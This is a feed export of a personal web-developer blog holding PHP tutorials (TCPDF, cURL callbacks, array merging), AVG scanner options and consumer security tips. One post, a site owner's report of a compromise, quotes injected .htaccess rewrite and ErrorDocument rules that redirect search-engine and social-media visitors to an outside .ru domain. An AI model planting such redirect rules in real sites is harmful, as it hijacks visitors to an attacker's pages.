tag:blogger.com,1999:blog-76832071969643550292024-02-20T00:12:53.245-08:00Web.focus()<a href="http://OntoDevelopment.com">OntoDevelopment.com</a>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.comBlogger18125tag:blogger.com,1999:blog-7683207196964355029.post-80567009113485859062012-09-06T16:38:00.003-07:002012-09-06T16:56:21.045-07:00TCPDF PrintScalingToday while using the <a href="http://www.tcpdf.org/">TCPDF</a> PHP class to generate Avery 5267 labels I discovered that when I went to go print, <b>Page Scaling</b> was automatically set to "Fit to printable area" and I needed to have it as "None". After about 20 minutes of poking around forums I finally found something that led me to the TCPDF::setViewerPreferences() method and the <i>PrintScaling</i> preference. I decided the cleanest way to achieve this was to write a new method.<br />
<br />
If you are extending TCPDF this is going to be pretty easy, do something like<br />
<br />
<?php<br />
<pre>class PDF extends TCPDF {
<b><span style="color: #cccccc;">...</span></b>
/**
* @author Brian Wendt (http://ontodevelopment.blogspot.com/)
* @link http://www.tcpdf.org/doc/classTCPDF.html#ad09b32089f8e68c9d8424a2777627c21
* @param string $preference key of preference
* @param mixed $value
*/
function setViewerPreference($preference, $value){
$this->viewer_preferences[$preference] = $value;
}
} </pre>
<h3>
Use</h3>
<pre>$pdf->setViewerPreference('PrintScaling', 'None');
</pre>
<br />
Otherwise, you'll need to be modifying the TCPDF class directly to do this cleanly.
<br />
Add the setViewerPreference() method from above to the TCPDF class. If you aren't extending and you aren't interested in changing the TCPDF class, then you'd simply use TCPDF::setViewerPreferences() like below but it has drawbacks.<br />
<br />
<pre>$pdf->setViewerPreferences(array(
'PrintScaling' => 'None'
));</pre>
<br />
(Note: using TCPFD::setViewerPreferences() overwrites other preferences you've set which is why I suggest creating the setViewerPreference() method)<br />
<br />
<span style="color: #444444;"><span style="color: black;"><a href="http://www.tcpdf.org/">TCPDF</a> (</span></span><span style="color: #444444;"><span style="color: black;">©Nicola Asuni) is a powerful PHP class to generate PDF documents.</span></span>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-46371654793040779352012-07-04T00:03:00.000-07:002012-07-30T00:24:53.318-07:00Sites Hacked? .htaccess files were code injected<b>(Previous Title: "Inmotion Hosting Hacked?")</b><br />
At 7/3/2012 11:25:22 PM, my existing .htaccess files were injected with the following:<br />
<pre><IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://2012medis.ru/cocumber?4 [R=301,L]
</IfModule></pre>
and
<br />
<pre>ErrorDocument 400 http://2012medis.ru/cocumber?4
ErrorDocument 401 http://2012medis.ru/cocumber?4
ErrorDocument 403 http://2012medis.ru/cocumber?4
ErrorDocument 404 http://2012medis.ru/cocumber?4
ErrorDocument 500 http://2012medis.ru/cocumber?4</pre>
I corrected the problem by removing the injected code from my existing files and deleting the one's that were added which I identified quickly as being 1.57 KB (1,608 bytes)<br />
<br />
<b>-UPDATE-</b><br />
It may be related to a file called ".cache_000.php" injected via a vulnerability with Wordpress. Look in your <i>/wp-content/uploads/</i> directory for <i>.cache_000.php</i><br />
For me the file had the same timestamp as some of the .htaccess files did.<br />
<br />
<b>-UPDATE- </b><br />
I updated my title to un-point the finger at Inmotion Hosting... the problem does appear to be fixed since I deleted that file and updated Wordpress.<br />
<br />
<b>-UPDATE- </b><br />
Update Wordpress or make the .cache_000.php file not accessible<b> </b>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com2tag:blogger.com,1999:blog-7683207196964355029.post-9302533140397874362012-05-22T16:00:00.000-07:002012-05-22T16:01:13.019-07:00PHP Merge Multidimensional Arrays<pre>function md_array_merge(){
$arrays = func_get_args();
$return = array();
foreach($arrays as $array){
foreach($array as $key=>$val){
if(is_array($val) && isset($return[$key])){
$return[$key] = md_array_merge($return[$key], $val);
} else {
$return[$key] = $val;
}
}
}
return $return;
}</pre>
<p>I wrote the above function to merge 2 or more multidimensional arrays. Use is similar to <a href="http://php.net/manual/en/function.array-merge.php">array_merge()</a>.</p>
<p><small>Provided with Open Source license without warranty</small></p>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com1tag:blogger.com,1999:blog-7683207196964355029.post-62756410369861365862011-10-18T09:27:00.000-07:002011-10-18T09:27:56.501-07:00Wordpress: You do not have sufficient permissions to access this page.I ran around in circles last night trying to figure out the culprit to this Wordpress error<br />
<blockquote>
You do not have sufficient permissions to access this page.</blockquote>
I finally ran into this blog this morning... saving my day (more or less literally). <br />
http://beconfused.com/2007/how-to-solve-you-do-not-have-sufficient-permissions-to-access-this-page-in-wordpress/Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-82142188151842314392011-04-20T10:42:00.000-07:002015-08-27T10:05:24.791-07:00CURLOPT_HEADERFUNCTION Tutorial with Example<h3>
Cutting to the Chase</h3>
<br />
So I've noticed there isn't much for documentation on the use of CURLOPT_HEADERFUNCTION so I've decided to try explaining it. So lets start with an example.<br />
<br />
<br />
<h3>
CURLOPT_HEADERFUNCTION Example</h3>
<br />
<pre><?php
class cURL {
public $response;
public $header;
function cURL($url){
$ch = curl_init($url);
curl_setopt_array($ch, array(
CURLOPT_RETURNTRANSFER => true, //Causes curl_exec() to return the response
CURLOPT_HEADER => false, //Suppress headers from returning in curl_exec()
<b>CURLOPT_HEADERFUNCTION => array($this, 'header_callback'),</b>
));
$this->response = curl_exec($ch);
curl_close($ch);
return $this->response;
}
function header_callback($ch, $header_line){
$this->header .= $header_line;
return strlen($header_line);
}
}
?></pre>
<br />
This is a really simple example of the use of curl. Really a solid class would have a whole lot more going on, but that isn't what this example is for...<br />
<br />
CURLOPT_HEADERFUNCTION expects the name of the function to callback when it receives the headers from the request. There are two common ways you'll see this:<br />
<br />
<ul><br />
<li>CURLOPT_HEADERFUNCTION => 'header_callback',</li>
<br />
<li>CURLOPT_HEADERFUNCTION => array($this, 'header_callback'),</li>
</ul>
<br />
If you are familiar with <a href="http://php.net/manual/en/function.call-user-func-array.php">call_user_func_array()</a> you're a step ahead and can skip to the next section.<br />For a normal function, simply the name of the function will suffice, but to call a method you'll need to pass an <i>array</i> with the object and the method to call on it.<br />In my example, I'm calling <b>$this->header_callback()</b> by using <b>array($this, 'header_callback')</b>.<br />
<br />
<br />
<h3>
The Callback Function/Method</h3>
<h3>
</h3>
You'll need to define the function or method you'll want to use as the callback.<br />There isn't a whole lot of variation between working example's I've found, that is probably because there isn't a whole lot you can do.<br />
<br />
<b>Parameter 1:</b> The curl object created by curl_init. This is handy for some rare scenarios, but for the most part useless.<br />
<br />
<b>Parameter 2:</b> A single line from the header. This is where some people get lost, its the GOTCHA and I'll explain it below.<br />
<br />
<b>Returns:</b> The function/method MUST return the number of bytes written. Why? I'm really not sure, but it must be done or it throws errors at you till you die.<br />
<br />
<br />
<h3>
The GOTCHA!</h3>
<br />
Something not clearly stated anywhere is that the header doesn't come all in one chunk, in my experience the callback is executed for each line of the header.<br />This makes using CURLOPT_HEADERFUNCTION outside of an object cumbersome because you'll likely end up using a global variable (which is just ugly and some old guys will call you the devil).<br />For OOP'ers, you'll have no problem just appending the lines to a property like in my example where I use <i>$this->header.</i><br />
<br />
<br />
<h3>
Comment, Tweet, Like, Share, or whatever is hip with the kids these days </h3>
<br />
If you found this useful and better than other tutorials for CURLOPT_HEADERFUNCTION, please show me some love on the great interwebs.Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com7tag:blogger.com,1999:blog-7683207196964355029.post-75994987537415459442011-01-08T23:12:00.001-08:002011-05-17T15:14:41.365-07:00New WebsitePhoenixGirlsDress.com is a small, quick one page business site. From first contact on Wednesday to publication tonight, the project went smoothly without a hook.<br /><br />*Revised: Never say "without a hook". Client decided she wanted more for free and then demanded a refund because she didn't get new clients (within first month of new site). Fun funBrian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-90348602618952844822010-11-03T09:09:00.001-07:002010-11-03T16:54:29.383-07:00BuzzClassAction.com Scam?<div class="posterous_autopost"><p>Most all of Gmail users received this email:</p> <blockquote> <p>Google rarely contacts Gmail users via email, but we are making an exception to let you know that we've reached a settlement in a lawsuit regarding Google Buzz (<a href="http://buzz.google.com/">http://buzz.google.com</a>), a service we launched within Gmail in February of this year.</p> <p>Shortly after its launch, we heard from a number of people who were concerned about privacy. In addition, we were sued by a group of Buzz users and recently reached a settlement in this case.</p> <p>The settlement acknowledges that we quickly changed the service to address users' concerns. In addition, Google has committed $8.5 million to an independent fund, most of which will support organizations promoting privacy education and policy on the web. We will also do more to educate people about privacy controls specific to Buzz. The more people know about privacy online, the better their online experience will be.</p> <p>Just to be clear, this is not a settlement in which people who use Gmail can file to receive compensation. Everyone in the U.S. who uses Gmail is included in the settlement, unless you personally decide to opt out before December 6, 2010. The Court will consider final approval of the agreement on January 31, 2011. This email is a summary of the settlement, and more detailed information and instructions approved by the court, including instructions about how to opt out, object, or comment, are available at <a href="http://www.buzzclassaction.com/">http://www.BuzzClassAction.com</a></p> </blockquote> <p>Most people took one look at this and figured that this was a scam, fraud, or just spam of some sort. A quick search for "<em>BuzzClassAction.com Scam</em>" doesn't return much. Several Google Employees have confirmed the legitimacy of this email though. The website simply informs you of the background of the <span>lawsuit and doesn't ask you for money. Some people are qualified to be part of the class action, but I don't think anyone is going to get money from it because they can't prove damages.<br /></span></p> <p><strong>Confirmations</strong><br /><a href="http://www.google.com/support/forum/p/gmail/thread?tid=3baa11d440d1f16d&hl=en" target="_blank">http://www.google.com/support/forum/p/gmail/thread?tid=3baa11d440d1f16d&hl=en</a><br /><a href="http://www.google.com/support/forum/p/gmail/thread?tid=2bfa59608687a83d&hl=en" target="_blank">http://www.google.com/support/forum/p/gmail/thread?tid=2bfa59608687a83d&hl=en</a></p><br /><p>Still not sure if <a href="http://www.buzzclassaction.com/">BuzzClassAction.com</a> is legit? Don't got to it, you're not missing out on anything.<br /></p></div>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-51677376462542772582010-11-02T15:04:00.001-07:002010-11-02T15:06:18.522-07:00PHP: hex color to RGB<div class='posterous_autopost'><p>I wrote this small script to convert a hex color to RGB value.</p> <p><code> <?php<br />function hex2rgb($h){<br /> $h = trim($h,'#');<br /> if(strlen($h)==3) $h=$h[0].$h[0].$h[1].$h[1].$h[2].$h[2];<br /> if(strlen($h)!=6) return false;<br /> $d = hexdec($h);<br /> return array("R"=>0xFF&($d>>0x10),"G"=>0xFF&($d>>0x8),"B"=>0xFF&$d);<br />}<br />?> </code></p> <p>I know this isn't helpful to the majority of my readers, but nonetheless here it is.</p></div>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-72599050023835634092010-11-02T10:56:00.001-07:002010-11-02T10:56:19.425-07:00I'm trying out ping.fm<br />So far posterous.com has worked but I'm having some problems with blogging.Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-44562829093416802192010-10-28T16:46:00.001-07:002010-10-28T16:46:04.450-07:00For the nerds<div class='posterous_autopost'>AVG 2011 command line perimeters <br /><code> <br />AVG 2011 Anti-Virus command line scanner <br />Copyright (c) 1992 - 2010 AVG Technologies <br />/SCAN Scan /for example SCAN=path;path/ <br />/COMP Whole computer scan <br />/HEUR Use heuristic analysis <br />/EXCLUDE Exclude path or files from scan <br />/@ Command file /file name/ <br />/EXT Scan these extensions /for example EXT=EXE,DLL/ <br />/NOEXT Do not scan these extensions /for example NOEXT=JPG/ <br />/ARC Scan archives <br />/CLEAN Clean automatically <br />/TRASH Move infected files to the Virus Vault <br />/QT Quick test <br />/LOG Generate a scan result file <br />/MACROW Report macros <br />/PWDW Report password-protected files <br />/ARCBOMBSW Report archive bombs (repeatedly compressed archives) <br />/IGNLOCKED Ignore locked files <br />/REPORT Report to file /file name/ <br />/REPAPPEND Append to the report file <br />/REPOK Report uninfected files as OK <br />/NOBREAK Do not allow CTRL-BREAK to abort <br />/BOOT Enable MBR/BOOT check <br />/PROC Scan active processes <br />/PUP Report "Potentially unwanted programs" <br />/PUPEXT Report enhanced set of Potentially Unwanted Programs <br />/REG Scan registry <br />/COO Scan for Tracking Cookies <br />/? Display help on this topic <br />/HELP Display help on this topic <br />/PRIORITY Set scan priority /Low, Middle, High, User Sensitive/ <br />/SHUTDOWN Shutdown computer upon scan completion <br />/FORCESHUTDOWN Force computer shutdown upon scan completion <br />/ADS Scan Alternate Data Streams (NTFS only) <br />/HIDDEN Report files with hidden extension <br />/INFECTABLEONLY Scan files with infectable extensions only <br />/THOROUGHSCAN Enable thorough scanning</code></div>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com1tag:blogger.com,1999:blog-7683207196964355029.post-55099151013441892402010-10-19T09:22:00.001-07:002010-11-01T19:17:42.573-07:00Steve Jobs defends iPad vs new Android tabletsSteve Jobs, CEO of Apple, made some interesting points at this quarter's <i>earnings calls. </i>Apple achieved their first $20 <b>billion </b>quarter and is looking at their competition with scrutinous eyes.<br /><p>In comparison, Apple activates an average of 275,000 devices per day while Android lags behind still with an average of 200,000 per day. Apple boasts a app store container 300,000+ apps, over three times that of which Android has in it's app marketplace. Jobs also explained how the company feels about the differences Android and Apple have in approach to their mobile devices saying "[w]e think Android is very, very fragmented, and becoming more fragmented by the day". The fragmenting that Jobs is referring to is the fact that Android's open approach has created over 100 variations of the Operating System making app development more difficult and prone to incompatibility issues and lack of support on the lesser used Android models. Being a Droid user myself, I've felt the burn of being on what seems like an already outdated HTC Eris platform, but this feeling for the most part comes from HTC's reluctance took make updates for their first Android child while they focus on the Droid Incredible.<br /><p>This year's innovative release of the iPad attracted over 3million consumers in less than 3 months looking to own one for business, art, or even just for gaming. Mobile device manufactures frantically struggle to release competing tablet devices but, according to Steve Jobs, will fail. "[A]lmost all of them use 7-inch screens, as compared to iPad's near 10-inch screens.", Jobs claims, "The screen measurements are diagonal, so that a 7-inch screen is only 45 percent as large as iPad's 10-inch screen". On top of this, Android urges manufactures to hold off from jumping in on the market until next year's release of a Android platform designed specifically for tablet devices.</p>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-85219865579930603752010-10-14T08:59:00.001-07:002010-10-14T08:59:48.358-07:00National Cybersecurity Awareness Month<div class='posterous_autopost'>Well, ok, there is no official month for this deems by the powers be, but one or two geek groups are observing this year's 7th annual National Cybersecurity Awareness Month.<br /><b>Some tips from me to you:</b><br /><ol><li> Be sure you have anti-virus software on your computer.</li><li>Be sure that your anti-virus software is actually activated, working, and up-to-date.</li><li>Links on Facebook are not always actually posted by friends. Be very cautious any time you follow someone's link.</li> <li>YouTube and Facebook is not likely to ask you to update, download, or enable anything if its already been working for you.<br /></li><li>If something seems suspicious, its probably for a good reason. Check the URL to be sure you're really where you think you are.</li> <li>Anytime you are prompted for a password, look at the URL to be sure you're not being Phished.</li><li>If a anti-virus software comes up that you don't recognize, its likely malware and your Anti-Virus has failed. Shut down your computer and call your Geek.</li> <li>Websites offering free scans of your computer are 99% of the time a BAD idea.</li><li>If your email or Facebook gets " "hacked" " (more likely Phished), change your password and check your account settings for traces the intruder left.</li> <li>Passwords should be 8 characters or longer, have more than just letters. More importantly to your security is to be sure you follow #6. Phishing is getting too common.</li></ol>If you don't know who your Geek is, its that computer person in your family, friends, or church you trust. If you've got no Geek in mind, call me. </div>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-39003212290009188972010-10-13T12:28:00.001-07:002010-11-01T17:49:21.381-07:00New Facebook Feature<div class='posterous_autopost'>Facebook will soon be allowing users to text into the normal text number (<span name="intellitxt">32665) the letters "opt" and receive a one time use password to log in with. This is great for using at public locations where you should not trust the network. Facebook hopes to have the feature available in the next few weeks to everyone. Note: you will need to have your cell phone associated with Facebook, of course you can make that phone number not visible to the public in your security settings.<br /> </span></div>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-4982942849882653262010-08-21T14:38:00.000-07:002010-08-21T15:53:49.987-07:00Facebook "Places" for iPhone could risk usersA new feature for the iPhone allows users to easily "check-in" their location through Facebook Places. Using the GPS on the mobile device, Facebook logs where you are when you check-in and even allows you to tag friends that are with you. As Facebook learns more locations, checking in while at friend's houses will intelligently connect your location to that friend. Currently only the iPhone will have this feature, but soon enough other smart phones with the Facebook app will catch up. <br /><br />Seemingly, the decision to share your location is up to you, but considering Facebook's history I'm not sure I should trust that.. than again maybe they've learned. Of course, again in Facebook history the privacy of it's users is being brought into public scrutiny even though other websites such as Twitter already offer location features like this as received much less flak.<br /><br />There has always been privacy concerns with the internet all the way back to simple bulletin board websites then chat rooms. The simple solution is to limit the information you put online and assume anything you do is available to more people than just who you gave it to. Although internet security has gotten better, more people are flaunting their personal information around the web then ever before giving scammers and identity thiefs a lot of incentive and material to work with.Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com1tag:blogger.com,1999:blog-7683207196964355029.post-66000000878036426442010-08-12T11:28:00.000-07:002010-08-12T12:09:01.755-07:00Facebook has your information, and who else?A few weeks ago, Facebook added an option to disallow websites from getting your private data. Although the option empowered the users, it stirred some controversy over your private information's security. Apparently people like publishing their information online and not having it public at the same time (Cake anyone?).<br /><br />If you are one of those people worried about their privacy, here's a dosage of reality. Facebook application developers have ample information about you, the only thing they need is for you to add the app. According to the Facebook Application Programming Interface (API) documentation (<a href="http://developers.facebook.com/docs/reference/api/user">http://developers.facebook.com/docs/reference/api/user</a>), the following possibly sensitive information is shared: first name, last name, gender, email (though not direct), "about" blurb, birthday, work history, education, hometown, location, significant other, political & religious views, your profile picture, and who's on your friends list.<br />Even if you don't add every app that comes your way, your friends might. Via a friends profile, they can find out your name and possibly more.<br /><ul><br /><i>The photo albums this user has created. Requires the user_photos or friend_photos permission</i><br /></ul><br />This means that unless your friends block photo permissions to apps, it is still available to people out there.<br /><br />Even more information (even the subject lines of your inbox) is available to the applications if your setting allow for it, but the good part is that you get to modify your privacy settings to keep some of your information private. Some people may be comfortable with sharing their information, but others may want to highly consider changing their privacy settings. <a href="http://www.facebook.com/#%21/settings/?tab=privacy">http://www.facebook.com/#!/settings/?tab=privacy</a>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-5961092466017241312010-08-11T12:01:00.000-07:002010-08-11T12:56:33.106-07:00iPhone Browsing SecurityiPhone jailbreak website, jailbreakme.com, uses a hole in the security to modify the iPhone firmware so that you can install themes and apps that Apple has not approved. Although most consider this security exploit handy for the jailbreak system, the implication is that other clever developers will be able to exploit the iPhone vulnerability to install spyware or other malicious firmware modifications. Jailbreakme.com states on their website that they cannot jailbreak iPhones with firmware versions 4.0.2 and greater. As an iPhone owner, you must choose to update your phone past 4.0.1 and have the security benefits, or leave your phone vulnerable but take advantage of the jailbreak benefits.Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0tag:blogger.com,1999:blog-7683207196964355029.post-53768096106577582842010-08-10T15:19:00.001-07:002010-08-10T16:05:31.206-07:00Get Onto Social NetworkingAlmost every person in America has access to the internet, most of them use it regularly. The most visited websites are search engines and social networking sites. Internet users are sharing information and media around the world, sharing with their friends and distant acquaintances what they like and don't like. Your best strategy to get your website out there on the web and seen is to promote to thousands and even millions!<br /><br /><b>Facebook & Twitter</b><br />Make a Facebook and Twitter profile for your business, organization, or individual self. Start by adding your friends and asking them to suggest you to their friends for Facebook. This will get hopefully a basis of at least 50 people on your friends list. By posting helpful information about your market or interests on Facebook and Twitter, users will "share" and retweet your information. Always remember to plug your website wherever possible so that they know where the information is coming from. Back your information as articles or blog posts on your website so that the reader can get more information on the topic meanwhile discovering your website.Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com1tag:blogger.com,1999:blog-7683207196964355029.post-48276393313076209222010-08-10T12:11:00.000-07:002010-08-10T21:44:24.877-07:00The New Style of Viruses<b>This is a quick lesson in some of the new threats going around.</b><br />I use the word "virus" loosely, much of it is actually general "malware" which includes spyware. Most of the new threats going around present themselves as being a anti-spyware program that has found some absurd amount of threats on your computer and they want you to purchase there software's full version in order to remove the threats. These programs are also called "Blackmail-Ware".<br />Here is a guide to what you should do if you get one:<br /><ol><br /><li>Identify that you have one of these new viruses. If anything but your installed anti-virus software pops up saying you have viruses. This includes "Windows Security Alert" telling you that you have infections.</li><br /><li>Unplug internet activity from your computer. This will prevent the virus from talking to it's buddies or pulling up porn sites.</li><br /><li>Turn off your computer. This will prevent the virus from spreading... they commonly do get worse as they sit around.</li><br /><li> Contact your nerd. You all have one, if not, than you don't realize who's not you are reading now!</li><br /><li>If you are your nerd, here's some tips<br /><ul><br /> <li>These new malware programs are good at keeping you from running programs to kill them, you'll need to run rKill (find through google) but only in early stages of the infection and it needs to be ran as soon as windows will let you run it (while startup programs are still initializing).</li><br /> <li>MalwareBytes is the toughest anti-walware you have in your free arsenal. The new viruses and spyware will try stopping you from running it though, that's where rKill comes in.</li><br /> <li>SuperAntiSpyware is also handy for some versions out there.</li><br /> <li>Tip: you won't be able to download these from the infected computer, so get them onto a flash drive.</li><br /></ul><br /></ol>Brian Wendthttp://www.blogger.com/profile/17116120472408476286noreply@blogger.com0